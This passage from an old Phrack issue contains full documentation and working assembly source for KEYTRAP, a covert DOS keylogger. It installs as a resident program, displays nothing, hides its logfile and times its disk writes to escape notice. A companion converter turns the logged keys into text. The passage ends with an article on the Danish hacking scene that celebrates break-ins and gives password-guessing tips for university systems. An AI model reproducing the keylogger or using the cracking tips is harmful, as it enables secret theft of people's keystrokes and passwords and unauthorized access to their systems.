TO DATA AND IS NOT INTENDED TO HELP USERS TO VIOLATE THE LAW !
-------------------------------------------------------------------------
You may distributed UNMODIFIED copies of KEYTRAP freely, subject to the
above limitations, and provided all files are included in unmodified
form; KEYTRAP.EXE, KEYTRAP.DOC
-------------------------------------------------------------------------
The author disclaims ALL warranties relating to the program, whether
express or implied.  In absolutely no event shall the author be liable
for any damage resulting from the use and/or misuse of this program.
-------------------------------------------------------------------------




WHAT IS KEYTRAP ?
~~~~~~~~~~~~~~~~~
KEYTRAP is a very effective keyboard key logger that will log
keyboard scancodes to a logfile for later conversion to ASCII
characters. Keytrap installs as a TSR, remaining in memory
until the computer is turned off.

CONVERT will convert the keyboard scancodes captured by Keytrap
to their respective keyboard (ASCII) characters.


Usage: KEYTRAP <dir\logfile> /A /B /C
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A - Maximum size of logfile
B - Number of keys to log per session
C - Number of minutes between each session

Keytrap is a command line program.

<dir\logfile> - You MUST specify a directory for the logfile.
If you don't specify a directory Keytrap will only look in the
current directory for the logfile. If the logfile is not found
in the current directory no writing will occur. Keytrap will
append the scancode data to the end of the file you specify.

A - The Maximum size of the logfile. This number is checked only
when Keytrap is installed. If the size of the logfile exceeds this
number, Keytrap will delete the logfile and create a new one.

B - This is the number of keys to log per session. Keytrap will
only check this number AFTER a write to the logfile. So if you
specify 50 keys, and Keytrap does not get a chance to write till
there are 100 keys in the buffer, then Keytrap will log 100 keys.

C - This is the number of minutes between each session. When Keytrap
reaches or exceeds the number of keys to log per session, it will
start a delay routine and check this number. You can't specify more
then 1440 minutes, the number of minutes in a day !

Example: KEYTRAP c:\logfile /20000 /200 /20

Keytrap will check "logfile" to see if it exceeds 20,000
bytes. If it does, Keytrap will delete the log file and then
create a new one. Keytrap will then install as a TSR program.
It will log approx 200 keys at a time with a delay of 20 minutes
between each session.


Usage: CONVERT logfile outfile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
logfile: The file that contains the scancodes that Keytrap logged.
outfile: Specify an output file name.

Theres not too much to say here. This program just converts scancodes
from the logfile into their respective keyboard (ASCII) characters.


NOTES
~~~~~
Keytrap will not display ANY messages. Check the logfile and
the size of the logfile if your not sure Keytrap is working.

Keytrap will only make the logfile hidden if the logfile is
actually created by Keytrap or the maximum size of the logfile
is reached or exceeded. If you specify a file that already
exists then Keytrap will not change that files attributes and
will append all scancode data to the end of the file.

Keytrap will not crash if the logfile gets deleted while Keytrap
is in memory. It will just keep looking for the logfile so it can
write its buffer. A buffer write is not forced until the buffer
reaches 400 bytes. It will then try to write its buffer during
the next interrupt 21 call.

-------------------------------------------------------------------------

If you have any questions or need some help, e-mail me.
Below is my public pgp key, don't e-mail me without it !

                             Dcypher (Dcypher@aol.com)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAi3iD5cAAAEEAMVJGdgCYzG5av0lLSjO7iXm64qsuk6v/dx5XcMoNmOHNUA3
+tzF0WuVPXuJ59mFxE3/rhQqyh8Mci0f4qT6TR7FfSb8vtzSkF5vW8cNUmQx8Qvf
B/YQZVmztNlWOPROAmT8ZHbsrNev2rgeYjouW3ZOUgA4RKBRYiCTuXD+VOlxAAUR
tBlEY3lwaGVyIDxEY3lwaGVyQGFvbC5jb20+
=w2RN
-----END PGP PUBLIC KEY BLOCK-----

*****************************************************************************

;
;
; KEYTRAP v1.0 - Keyboard Key Logger
; By Dcypher (Dcypher@aol.com)
;
; Usage: KEYTRAP <dir\logfile> /A /B /C
;
;        A - Maximum size of log file.
;        B - Number of keys to log per session.
;        C - Minutes between each session.
;
;------------------------------------------------
      ;
 .286                                    ; 286 or better
 .model small                            ;
 .code                                   ;
 org     100h                            ;
      ;
begin:  jmp     install    ;
      ;
;================================================
      ;
db      ' DCYPHER@AOL.COM / KEYTRAP V1.0 ' ; PLEASE DON'T REMOVE
      ;
buf             db 401 dup (0)                  ; 400 byte buffer
bufptr          dw 0                            ;  +1 for luck :)
      ;
hide            db 0    ; save int21 function call
stimem          dw 0    ; grab time when done
handle          dw 0                            ; logfile handle
control         db 0    ; control which INT to use
done_flag       db 0    ; session done flag
must_write      db 0                            ; must-write flag
write_amount    dw 0                            ; amount written to disk
using_21        db 0    ; already doing an int-21
      ;
old_9a_off      dw 0    ;
old_9a_seg      dw 0                            ;
      ;
old_9b_off      dw 0    ;
old_9b_seg      dw 0                            ;
      ;
old_21_off      dw 0                            ;
old_21_seg      dw 0                            ;
      ;
datasegm        dw 0                            ; save data-segment
      ;
delaym          dw 0    ; delay, in minutes
mkeys           dw 0                            ; maximum number of keys
logH            dw 0                            ; log file size
logL            dw 0                            ; log file size
      ;
;==============================================================================
      ;
int_9A: pushf                                   ;
 pusha                                   ;
 push    es     ;
        push    ds                              ;
 mov     ds, datasegm                    ; we are here
      ;
 cmp     control, 1   ; use this one ?
        je      A91    ;
        call    pkey    ; process key (scancode)
        ;
   A91: pop     ds                              ;
 pop     es                              ;
 popa                                    ;
 popf                                    ;
 jmp     dword ptr old_9a_off            ;
      ;
;================================================
      ;
  pkey: cmp     done_flag, 1                    ; completely done ?
 je      pk2                             ;
 cmp     bufptr, 400                     ; buffer limit reached ?
 jae     pk2                             ;
      ;
 in      al, 60h                         ; get scancode
      ;
 cmp     al, 39h                         ; get downstroke and only
 ja      pk2                             ; as far as spacebar
        cmp     al, 2Ah    ;
        je      pk2    ; no shift
        cmp     al, 36h    ;
        je      pk2    ; no shift
      ;
        push    0    ;
        pop     es    ;
        mov     ah, byte ptr es:[417h]  ; shift status
        test    ah, 43h    ; test for both shift keys
        je      pk1           ; and cap-lock active
      ;
        add     al, 80h    ; show shift or cap-lock
   pk1: mov     di, bufptr                      ; in logfile
 mov     buf[di], al                     ; place scancode in buffer
 inc     di                              ;
 mov     bufptr, di                      ;
        mov     must_write, 1      ; try to write buffer
      ;
   pk2: ret     ;
      ;
;================================================
      ;
int_9B: pushf                                   ;
 pusha                                   ;
 push    es                              ;
 push    ds                              ;
 mov     ds, datasegm                    ; we are here
      ;
        cmp     control, 0   ; use this one ?
        je      B91       ; (not really needed)
        call    pkey    ; process a key (scancode)
      ;
   B91: pop     ds                              ;
 pop     es    ;
 popa                                    ;
 popf                                    ;
 jmp     dword ptr old_9b_off            ;
      ;
;==============================================================================
      ;
int_21: pushf                                   ;
 pusha                                   ;
 push    es                              ;
 push    ds                              ;
 mov     ds, datasegm                    ; here we are
      ;
        cmp     ax, 0ffffh   ; check if already installed
        je      D21    ;
      ;
 cmp     using_21, 1                     ; might need to call an
 je      C21                             ; int-21 here so jump if
 mov     using_21, 1                     ; called from below
        mov     hide, ah   ; save function # for hiding
      ;
        call    switch     ; always control the int 9's
        call    timer    ; always check restart timer
      ;
 cmp     done_flag, 1                    ; completely done ?
 je      B21                             ;
 cmp     must_write, 1                   ; need to write ?
 jne     B21                             ;
        cmp     bufptr, 400   ; push a write when buffer
        jae     A21    ; is full
      ;
        cmp     hide, 3Fh    ; disk read
        je      A21    ; (hide buffer write)
        cmp     hide, 40h    ; disk write
        je      A21    ;
        jmp     B21    ; can't hide, try another time
      ;
   A21: call    saveb                           ; write buffer
      ;
   B21: mov     using_21, 0                     ; no int-21 calls anymore
   C21: pop     ds                              ;
 pop     es                              ;
 popa                                    ;
 popf                                    ;
 jmp     dword ptr old_21_off            ;
;------------------------------------------------
   D21: pop ds    ; already installed !
        pop es    ;
        popa     ;
        popf     ;
        mov     ax, 1    ; show installed
        iret     ;
      ;
;==============================================================================
      ;
timer:  cmp     done_flag, 0   ; only check time when
 je      timerb    ; session is complete !
      ;
        mov     ah, 2Ch    ;
        int     21h    ; what's the time ?
        mov     al, ch    ;
        xor     ah, ah    ;
        mov     bx, 60    ;
        mul     bx    ; multiply hours by 60
        xor     ch, ch    ;
        add     ax, cx    ; add in the minutes
           ;
        mov     bx, stimem   ;
        cmp     ax, bx    ; is time now same as
        je      timerb    ; when session was completed
      ; if so, don't do anything
        xor     cx, cx    ;
timer1: cmp     bx, 1440   ; midnight then back to 0
        jb      timer2    ;
        xor     bx, bx    ;
timer2: inc     cx    ; minutes counter
        inc     bx    ;
        cmp     ax, bx    ; count until time now
        jne     timer1    ;
      ;
        cmp     cx, delaym   ;
        jb      timerb    ; should we reset ?
      ;
        mov     done_flag, 0   ; reset / next session
timerb: ret     ;
      ;
;------------------------------------------------
      ;
switch: mov     ax, 3509h                       ;
 int     21h                             ;
 cmp     bx, offset int_9A               ; everything ok with 9A ?
 jne     sw1                             ; check offset
        mov     control, 0   ; show who has control
        ret            ;
                ;
   sw1: cmp     control, 1   ; 9B already in use ?
        je      sw2    ; yes, don't do anything
        mov     ax, 3509h   ;
        int     21h    ;
        mov     old_9b_seg, es   ;
        mov     old_9b_off, bx   ;
        mov     ax, 2509h   ;
        lea     dx, int_9B   ;
        int     21h    ; use 9B instead of 9A !
        mov     control, 1   ; show who has control
   sw2: ret                                     ;
      ;
;------------------------------------------------
      ;
saveb:  mov     ax, 3d01h                       ;
 mov     dx, 82h                         ;
 int     21h                             ; open logfile, r/w
 jc      probw                           ;
 mov     handle, ax                      ;
 mov     bx, ax                          ;
 mov     ax, 4202h                       ;
 xor     cx, cx                          ;
 xor     dx, dx                          ;
 int     21h                             ; point to eof
 jc      probw                           ;
 mov     ah, 40h                         ;
 mov     bx, handle                      ;
 mov     cx, bufptr                      ;
 lea     dx, buf                         ;
 int     21h                             ; write buffer
 jc      probw                           ;
 mov     ah, 3Eh                         ;
 mov     bx, handle                      ;
 int     21h                             ; close logfile
 jc      probw                           ;
;------------------------------------------------
 mov     cx, bufptr                      ; no problems writing
 add     write_amount, cx                ; so add to written amount
      ;
 mov     cx, mkeys                       ; check number of keys logged
 cmp     write_amount, cx                ; all done ?
 jb      donew                           ;
      ;
 mov     done_flag, 1                    ; show session complete
        mov     write_amount, 0   ; written amount to 0
        call    gtime    ; grab stop time [minutes]
      ;
donew:  mov     must_write, 0                   ; no need to write anymore
 mov     bufptr, 0                       ; buffer pointer back to 0
probw:  ret                                     ; try again another time
      ; (if problem writing)
;------------------------------------------------
      ;
gtime:  mov     ah, 2Ch    ; DONE
        int     21h    ; grab time in minutes
        mov     al, ch    ;
        xor     ah, ah    ;
        mov     bx, 60    ;
        mul     bx    ; multiply hours by 60
        xor     ch, ch    ;
        add     ax, cx    ; add in the minutes
        mov     stimem, ax   ; start time in minutes
        ret     ;
      ;
;==============================================================================
;==============================================================================
      ;
install:mov     bx, 80h                         ;
 cmp     byte ptr [bx], 0                ; any parameters ?
 je      bye                             ;
      ;
        mov   ax, 0ffffh   ;
        int     21h    ; already installed ?
        cmp     ax, 1    ;
        je      bye    ;
      ;
 call    conv                            ; convert command line numbers
 jc      bye                             ;
        call    clog    ; check or create logfile
      ;
        mov     ax, 3509h                       ;
 int     21h                             ;
 mov     old_9a_off, bx                  ; save old int 9
 mov     old_9a_seg, es                  ;
 mov     ah, 25h                         ;
 lea     dx, int_9A                      ;
 int     21h                             ; hook only 9A to start
      ;
 mov     ax, 3521h                       ;
 int     21h                             ;
 mov     old_21_off, bx                  ; save old int 21
 mov     old_21_seg, es                  ;
 mov     ah, 25h                         ;
 lea     dx, int_21                      ;
 int     21h                             ; point to new int 21
      ;
        mov     datasegm, ds   ; save this data segment area
      ; for later use in the ISR's
 mov     bx, offset install              ;
 mov     ax, 3100h                       ;
 mov     dx, bx                          ;
 mov     cl, 04h                         ;
 shr     dx, cl                          ;
 inc     dx                              ;
 int     21h                             ; end / save above install
      ;
   bye: mov ah, 4Ch    ; no installation
        int     21h    ; just end
      ;
;==============================================================================
      ;
  conv: push    ds                              ; convert command line options
 pop     es                              ;
 mov     di, 81h                         ;
 conv1: inc     di                              ;
 cmp     byte ptr [di], 2fh              ; point to first "/"
 jnz     conv1                           ;
 inc     di                              ; point to first number
 call    mconv                           ; convert it
 jc      conv4                           ; any problems ?
 mov     logH, dx                        ;
 mov     logL, cx                        ; save max logfile size
        add     cx, dx    ;
        cmp     cx, 0    ; make sure not 0
        je      conv4    ;
      ;
 dec     di                              ;
conv2:  inc     di                              ;
 cmp     byte ptr [di], 2fh              ; point to second "/"
 jnz     conv2                           ;
 inc     di                              ; point to first number
 call    mconv                           ; convert it
 jc      conv4                           ; any problems ?
        cmp     dx, 0    ; bigger then 65535 ?
        ja      conv4    ;
 mov     mkeys, cx                       ; save key limit
      ;
 dec     di                              ;
conv3:  inc     di                              ;
 cmp     byte ptr [di], 2fh              ; point to third "/"
 jnz     conv3                           ;
 inc     di                              ; point to first number
 call    mconv                           ; convert it
 jc      conv4                           ; any problems ?
        cmp     dx, 0    ;
        ja      conv4     ; bigger then 65535 end
        cmp     cx, 1440   ;
        ja      conv4    ; bigger then 1440 end
        mov     delaym, cx   ; save session delay time
        clc     ; show no problems
        ret     ;
conv4:  stc     ; show problem
        ret     ;
      ;
;------------------------------------------------
      ;
 mconv: xor     cx, cx                          ; main converter
 mov     dx, cx                          ; no comments here, all I
 mov     ah, ch                          ; know is that it works ! :)
 cld                                     ;
 dec     di                              ;
 convl: inc     di                              ;
 mov     al, es:[di]                     ; convert number at es:[di]
 xor     al, '0'                         ;
 cmp     al, 10                          ; carry flag will be set
 jae     convD                           ; if theres a problem
 shl     cx, 1                           ;
 rcl     dx, 1                           ;
 jc      convD                           ;
 mov     bx, cx                          ;
 mov     si, dx                          ;
 shl     cx, 1                           ;
 rcl     dx, 1                           ;
 jc      convD                           ;
 shl     cx, 1                           ;
 rcl     dx, 1                           ;
 jc      convD                           ;
 add     cx, bx                          ;
 adc     dx, si                          ;
 jc      convD                           ;
 add     cl, al                          ;
 adc     ch, 0                           ;
 adc     dx, 0                           ;
 jc      convD                           ;
 jmp     convl                           ;
convD: ret                                     ;
      ;
;------------------------------------------------
      ;
  clog: mov     bx, 82h                         ; point to logfile
 null1: cmp     byte ptr [bx], 20h              ; find first space
 je      null2                           ;
 inc     bx                              ;
 jmp     null1                           ;
 null2: mov     byte ptr [bx], 0                ; replace space with 0
      ;
        mov   ax, 3D01h   ;
        mov     dx, 82h    ;
        int     21h    ; open the file
        jc      clog3    ;
        mov     handle, ax   ; good open, save handle
      ;
        mov     ax, 4202h                       ;
 mov     bx, handle                      ;
 xor     cx, cx                          ;
 xor     dx, dx                          ;
 int     21h                             ; mov pointer to eof
      ;
 cmp     logH, dx                        ; check size
 ja      clog4                           ; size ok
 cmp     logH, dx                        ;
 je      clog1                           ;
 jmp     clog2                           ; must be below, not ok
 clog1: cmp     logL, ax                        ;
 ja      clog4                           ; size ok
      ;
 clog2: mov     ax, 4301h                       ;
 mov     dx, 82h                         ;
 xor     cx, cx                          ;
 int     21h                             ; change file mode
 mov     ah, 41h                         ;
 mov     dx, 82h                         ;
 int     21h                             ; delete file
      ;
 clog3: mov     ah, 3Ch    ; create new
        mov     cx, 02h    ; (hidden)
        mov     dx, 82h    ;
        int     21h    ;
        mov     handle, ax   ;
      ;
 clog4: mov     bx, handle   ; close logfile handle
        mov     ah, 3Eh    ;
        int     21h    ;
        ret     ;
      ;
;==============================================================================

end     begin

*****************************************************************************

;
;
; CONVERT v1.0 - Keytrap logfile converter
; By Dcypher@aol.com
;
; Usage: CONVERT logfile outfile
;
;        logfile - Keytrap's scancode data (logfile)
;        outfile - Specify an output file name
;
;
;----------------------------------------
     ;
 .286                            ;
 .model  small                   ;
 .code                           ;
 org     100h                    ;
     ;
start:  jmp     go                      ;
     ;
;----------------------------------------
     ;
inhandle        dw 0                    ;
inpointH        dw 0                    ;
inpointL        dw 0                    ;
loaded          dw 0                    ;
last            db 0                    ;
     ;
outhandle       dw 0                    ;
outoffset       dw 0                    ;
     ;
;----------------------------------------
     ;
table   db 002h, '1'                    ; scan-code table
 db 003h, '2'                    ;
 db 004h, '3'                    ;
 db 005h, '4'                    ;
 db 006h, '5'                    ;
 db 007h, '6'                    ;
 db 008h, '7'                    ;
 db 009h, '8'                    ;
 db 00Ah, '9'                    ;
 db 00Bh, '0'                    ;
 ;                               ;
 db 082h, '!'                    ;
 db 083h, '@'                    ;
 db 084h, '#'                    ;
 db 085h, '$'                    ;
 db 086h, '%'                    ;
 db 087h, '^'                    ;
 db 088h, '&'                    ;
 db 089h, '*'                    ;
 db 08Ah, '('                    ;
 db 08Bh, ')'                    ;
;----------------------------------------
 db 01Eh, 'a'                    ;
 db 030h, 'b'                    ;
 db 02Eh, 'c'                    ;
 db 020h, 'd'                    ;
 db 012h, 'e'                    ;
 db 021h, 'f'                    ;
 db 022h, 'g'                    ;
 db 023h, 'h'                    ;
 db 017h, 'i'                    ;
 db 024h, 'j'                    ;
 db 025h, 'k'                    ;
 db 026h, 'l'                    ;
 db 032h, 'm'                    ;
 db 031h, 'n'                    ;
 db 018h, 'o'                    ;
 db 019h, 'p'                    ;
 db 010h, 'q'                    ;
 db 013h, 'r'                    ;
 db 01Fh, 's'                    ;
 db 014h, 't'                    ;
 db 016h, 'u'                    ;
 db 02Fh, 'v'                    ;
 db 011h, 'w'                    ;
 db 02Dh, 'x'                    ;
 db 015h, 'y'                    ;
 db 02Ch, 'z'                    ;
 ;                               ;
 db 09Eh, 'A'                    ;
 db 0B0h, 'B'                    ;
 db 0AEh, 'C'                    ;
 db 0A0h, 'D'                    ;
 db 092h, 'E'                    ;
 db 0A1h, 'F'                    ;
 db 0A2h, 'G'                    ;
 db 0A3h, 'H'                    ;
 db 097h, 'I'                    ;
 db 0A4h, 'J'                    ;
 db 0A5h, 'K'                    ;
 db 0A6h, 'L'                    ;
 db 0B2h, 'M'                    ;
 db 0B1h, 'N'                    ;
 db 098h, 'O'                    ;
 db 099h, 'P'                    ;
 db 090h, 'Q'                    ;
 db 093h, 'R'                    ;
 db 09Fh, 'S'                    ;
 db 094h, 'T'                    ;
 db 096h, 'U'                    ;
 db 0AFh, 'V'                    ;
 db 091h, 'W'                    ;
 db 0ADh, 'X'                    ;
 db 095h, 'Y'                    ;
 db 0ACh, 'Z'                    ;
;----------------------------------------
 db 00Ch, '-'                    ;
 db 08Ch, '_'                    ;
     ;
 db 00Dh, '='                    ;
 db 08Dh, '+'                    ;
     ;
 db 01Ah, '['                    ;
 db 09Ah, '{'                    ;
     ;
 db 01Bh, ']'                    ;
 db 09Bh, '}'                    ;
     ;
 db 027h, ';'                    ;
 db 0A7h, ':'                    ;
     ;
 db 028h, 027h                   ; '
 db 0A8h, '"'                    ;
     ;
 db 033h, ','                    ;
 db 0B3h, '<'                    ;
     ;
 db 034h, '.'                    ;
 db 0B4h, '>'                    ;
     ;
 db 035h, '/'                    ;
 db 0B5h, '?'                    ;
     ;
 db 02Bh, '\'                    ;
 db 0ABh, '|'                    ;
     ;
 db 037h, '*'                    ;
 db 0B7h, '*'                    ;
     ;
 db 029h, '`'                    ;
 db 0A9h, '~'                    ;
     ;
;----------------------------------------
     ;
 db 039h, 020h                   ; space
 db 0B9h, 020h                   ; space with shift
     ;
 db 00Eh, 011h                   ; backspace
 db 08Eh, 011h                   ; backspace with shift
     ;
 db 01Ch, 00Ah                   ; return
 db 09Ch, 00Ah                   ; return with shift
     ;
 db 0                            ; End of Table
     ;
;==============================================================================
      ;
 fprob: mov     ah, 9                           ;
 lea     dx, ferr                        ;
 int     21h                             ;
 jmp     bye                             ;
      ;
prtuse: mov     ah, 9                           ;
 lea     dx, usage                       ;
 int     21h                             ;
      ;
   bye: mov     ah, 4Ch                         ;
 int     21h                             ;
      ;
;------------------------------------------------
      ;
    go: mov     ah, 9                           ;
 lea     dx, namver                      ;
 int     21h                             ;
      ;
 mov     bx, 80h                         ;
 cmp     byte ptr [bx], 0                ;
 je      prtuse                          ;
      ;
 call    null                            ;
 call    check                           ;
 jc      fprob                           ;
      ;
   go1: call    ldata                           ;
 call    conv                            ;
 call    sdata                           ;
 cmp     last, 1                         ;
 jne     go1                             ;
 jmp     bye                             ;
      ;
;------------------------------------------------
      ;
  null: mov     bx, 81h                         ;
 null1: inc     bx                              ;
 cmp     byte ptr [bx], 20h              ;
 jnz     null1                           ;
 mov     byte ptr [bx], 0                ;
      ;
 mov     outoffset, bx                   ;
 inc     word ptr [outoffset]            ;
      ;
 null2: inc     bx                              ;
 cmp     byte ptr [bx], 0Dh              ;
 jnz     null2                           ;
 mov     byte ptr [bx], 0                ;
 ret                                     ;
      ;
;------------------------------------------------
      ;
check:  mov     ax, 3D00h                       ;
 mov     dx, 82h                         ;
 int     21h                             ;
 jc      check2                          ;
 mov     bx, ax                          ;
 mov     ah, 3Eh                         ;
 int     21h                             ;
 jc      check2                          ;
      ;
 mov     ah, 3Ch                         ;
 xor     cx, cx                          ;
 mov     dx, outoffset                   ;
 int     21h                             ;
 jc      check2                          ;
 mov     bx, ax                          ;
 mov     ah, 3Eh                         ;
 int     21h                             ;
 jc      check2                          ;
      ;
 clc                                     ;
check2: ret                                     ;
      ;
;------------------------------------------------
      ;
 ldata: mov     ax, 3D00h                       ;
 mov     dx, 82h                         ;
 int     21h                             ;
 mov     inhandle, ax                    ;
      ;
 mov     ax, 4200h                       ;
 mov     bx, inhandle                    ;
 mov     cx, inpointH                    ;
 mov     dx, inpointL                    ;
 int     21h                             ;
      ;
 mov     ah, 3Fh                         ;
 mov     bx, inhandle                    ;
 mov     cx, 60000                       ;
 lea     dx, eof                         ;
 int     21h                             ;
 mov     loaded, ax                      ;
 cmp     ax, 60000                       ;
 je      ldata2                          ;
 mov     last, 1                         ;
      ;
ldata2: mov     ax, 4201h                       ;
 mov     bx, inhandle                    ;
 xor     cx, cx                          ;
 xor     dx, dx                          ;
 int     21h                             ;
 mov     inpointH, dx                    ;
 mov     inpointL, ax                    ;
      ;
 mov     ah, 3Eh                         ;
 mov     bx, inhandle                    ;
 int     21h                             ;
 ret                                     ;
      ;
;------------------------------------------------
      ;
  conv: mov     cx, loaded                      ;
 lea     si, eof                         ;
      ;
 conv1: lea     di, table                       ;
      ;
 cmp     cx, 0                           ;
 je      conv6                           ;
      ;
 mov     al, byte ptr [si]               ;
 conv2: mov     ah, byte ptr [di]               ;
 cmp     ah, 0                           ;
 je      conv4                           ;
 cmp     ah, al                          ;
 je      conv3                           ;
 add     di, 2                           ;
 jmp     conv2                           ;
      ;
 conv3: inc     di                              ;
 mov     al, byte ptr [di]               ;
 mov     byte ptr [si], al               ;
 dec     cx                              ;
 inc     si                              ;
 jmp     conv1                           ;
      ;
 conv4: mov     byte ptr [si], 20h              ;
 dec     cx                              ;
 inc     si                              ;
 jmp     conv1                           ;
      ;
 conv6: ret                                     ;
      ;
;------------------------------------------------
      ;
sdata:  mov     ax, 3D02h                       ;
 mov     dx, outoffset                   ;
 int     21h                             ;
 mov     outhandle, ax                   ;
      ;
 mov     ax, 4202h                       ;
 mov     bx, outhandle                   ;
 xor     cx, cx                          ;
 xor     dx, dx                          ;
 int     21h                             ;
      ;
 mov     ah, 40h                         ;
 mov     bx, outhandle                   ;
 mov     cx, loaded                      ;
 lea     dx, eof                         ;
 int     21h                             ;
      ;
 mov     ah, 3Eh                         ;
 mov     bx, outhandle                   ;
 int     21h                             ;
 ret                                     ;
      ;
;------------------------------------------------------------------------------

namver  db 10,13
 db 'CONVERT v1.0',10,13
 db 'Keytrap logfile converter.',10,13
 db 'By Dcypher (Dcypher@aol.com)',10,13
 db 10,13,'$'

usage   db 'Usage: CONVERT logfile outfile',10,13
 db 10,13
 db '       logfile - Keytrap',27h,'s scancode data.',10,13
 db '       outfile - Specify an output file name.',10,13
 db 10,13,'$'

ferr    db 'WARNING: Problem with one of the files.',10,13
 db 10,13,'$'

;------------------------------------------------------------------------------

eof     db 0
 end start


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 27 of 28

****************************************************************************

                             International Scenes

There was once a time when hackers were basically isolated.  It was
almost unheard of to run into hackers from countries other than the
United States.  Then in the mid 1980's thanks largely to the
existence of chat systems accessible through X.25 networks like
Altger, tchh and QSD, hackers world-wide began to run into each other.
They began to talk, trade information, and learn from each other.
Separate and diverse subcultures began to merge into one collective
scene and has brought us the hacking subculture we know today.  A
subculture that knows no borders, one whose denizens share the common goal
of liberating information from its corporate shackles.

With the incredible proliferation of the Internet around the globe, this
group is growing by leaps and bounds.  With this in mind, we want to help
further unite the communities in various countries by shedding light
onto the hacking scenes that exist there.  If you want to contribute a
file about the hacking scene in your country, please send it to us
at phrack@well.com.

This month we have files about the scenes in Denmark and Russia, updates
from Australia and Argentina, and a scan of Norway's toll-free exchange.

________________________________________________________________________________


                  The Computer Underground in Denmark


Dear Phrack Readers, what follows is a little about the Danish
computer underground, focusing on the hacking/phreaking scene.

A little introduction:

Even though Denmark itself is little country, with a little over 5 million
citizens, an active computer underground community thrives upon the growing
network links and computer systems which in these days seems to pop up all
over country.

The history of the hacking community in DK is not very old, but since the
first Danish hackers appeared some 5 years ago, there has been increasing
hacking activity, bringing on a history of busts, paranoia and times of war;
but also a history of great friendships, supremacy over the corporate machine,
and a process of learning more about the world we live in. But before we take
a look at the networks, boards and the community itself, let's go back in time,
and find the place where it all started.

The Past:

The first hackers to appear in DK was JubJub Bird and Sprocket, two high
school students which broke into 100's of computers world wide. At that time
there was no H/P scene in DK, no boards, no HP networks and no fellow hackers.
Nevertheless, JubJub's role in the Danish HP history plays a key role. JubJub
got busted early January '90, after being discovered in some of NASA's non
public machinery, and being under surveillance for a period of time. This was
the beginning of what was to become the Danish hacking scene. JubJub and
Sprocket never got a sentence, since the court had absolutely no idea of how
to handle a case like this. The court sat down a period of 2 years, and if
JubJub or Sprocket was caught in hacking within that period they would
get a verdict.

Anyway, after the bust of JubJub and Sprocket, the first stirs of hackers
appeared and began to expand like rings in water. And suddenly we had a growing
happy hacking community. Hackers from all over the country gathered at newly
started 'HPA only boards' which was a rarely seen thing among the sea of WaReZ
boards. One of the coolest boards was Fantasia, the headquarters of MoTIGoL,
which was being run by Netrunner. Fantasia was the largest in Denmark, maybe
even in Scandinavia, and had callers from all over the world. At that time,
nobody was afraid of getting busted, and A LOT of BlueBoxing, X25, and general
hacking on Inet was done. But one day all that changed.

During the winter '91 DIKU (Institute of computer science, Copenhagen
university) was used as a meeting place of hackers. A lot of novice hackers
used the machines to learn about Internet and UNIX in general, skating through
the internet, trading info, chatting at IRC and stuff like that. What nobody
knew was that Jgen Bo Madsen, security expert and high paid consultant
working for UNI*C, was monitoring all traffic from and off DIKU, with evil
intentions of busting! The law enforcement specter was soon to cast its dark
shadow on the whole of the Danish scene.

It all ended one winter afternoon. I remember turning on the TV, not really
paying attention to the news, reading a book or so, when suddenly the news
lady starts speaking about how the secret service is soon to unravel the biggest
hacker conspiracy ever in Denmark, one hacker was already arrested and 10 more
would be arrested in near future. Saron was the one who got busted. He had used
an x25 datapak link, which normally only was used for electronic mail, to
access DIKU, coming in from a German PAD to make tracing harder, but also
making a hell of a big bill for the stolen NUI's owner. Anyway, it came out
that JBM (Jgen Bo Madsen) had traced 76 calls to DIKU, and had monitored the
breakins of computers in Greece, Brazil, Mexico and USA.

At that moment the entire scene more or less panicked. Most dudes moved
their precious machinery out of the house and all boards closed down.
A period of isolation began. The SysOp of Fantasia, Netrunner pulled out his
harddisk hiding it somewhere out of reach, if JBM and his secret service
buddies should show up.

No more busts happened and people calmed down after a month or so. Everybody
knew that things wouldn't be the same after the DIKU incident. Netrunners
harddisk broke down after he had reinstalled it, because all the dirt it
had consumed from 2 years constant running, was too much for the thing to
handle when it was powered back on. So, Fantasia closed and the underground
network PhoenixNet also closed when it came out that JBM had infiltrated
the net. An era was over, and a new was to begin.


The Present:

Today's scene is doing quite good. It has became harder in a way, more
careful and more closed than ever. But still, we have open boards
and a public network. FOOnet which focuses on computer security and is
used as an forum open for discussions. Mostly by hackers and people into
computer security in general, but every once in awhile JBM and Sysadm's
drop by too. Also, the Danish scene is proud to release CrackerJack, made by
Jackal, which we still claim is the fastest UNIX passwd cracker available for
PC. Not that cracking passwd files is a major element in hacking, but its nice
to have a fast cracker every once in awhile :)

The Danish computer underground scene is filled with WaReZ boards,
but only a few real H/P/A boards are running. Boards like Free Speech Inc.
and Freeside are places where the Danish hackers hang out. None of these
boards are public, but JBM is quite aware of them and had once infiltrated
Freeside, even though it was clearly stated that the bbs was private and
no one related to any gov agencies was allowed to use the board. So, JBM
is actually doing what he has accused us for over the years, which is
intruding people's privacy.

Other than FOOnet, there is a few other networks, such as SDC which
once had a good mail flow in the hacking conferences, but today more
is turning into a demo/warez net. A few other truly H/P nets are running
successful with a good mail flow, but those shall remain anonymous in
this article.

The links from the Danish scene to fellow hackers around the world is
very good. Due to numerous nights spent at QSD, connections is established
to a lot of dudes in Brazil which frequently drops by Free Speech Inc. and
Freeside, dudes in UK as well as fellow hackers in US like Alby/Empire.

Okay, this is it. The section about hacking in Denmark. The stuff
that you had to read all the above boring shitty sentimental stuff,
to get to!!


Hacking in Denmark:

The two main networks in DK which is used for hacking and meeting fellow
hackers are, (of course) Internet and the X25 datapak link. Internet is
accessible via all Universities like diku.dk, daimi.aau.dk, auc.dk and so on.
(Nobody uses DIKU anymore though). The university is doing a brave struggle
to keep the hackers out by upgrading to C2 passwd security, meaning that
passwds must be at least 8 chars, contain 1 uppercase and 1 non alphabetic
char.

The upper level of the top 10 of chosen C2 security passwd's goes something
like: q1w2e3r4*, a1s2d3f4*, these do not contain any uppercase chars and
therefore should not have been accepted as a passwd by the system, but
apparently the C2 software finds them secure. Also, a nice thing to do is
taking your wordlist and using Therion's Passwd Utility, TPU which is a word
list manipulator, and add a 1* to all words in the list and uppercase the first
letter. Gives a lot of accounts.

Another popular thing, in order to keep hackers out, is to setup a so-called
'modem security password' on all dialups. So when you call up the system,
before you ever get to the server you have to enter a password. And if you get
through, not all accounts are cleared to use the modem dialup facilities,
and unless you've got your sleazy hands on a cleared account, you get the boot.

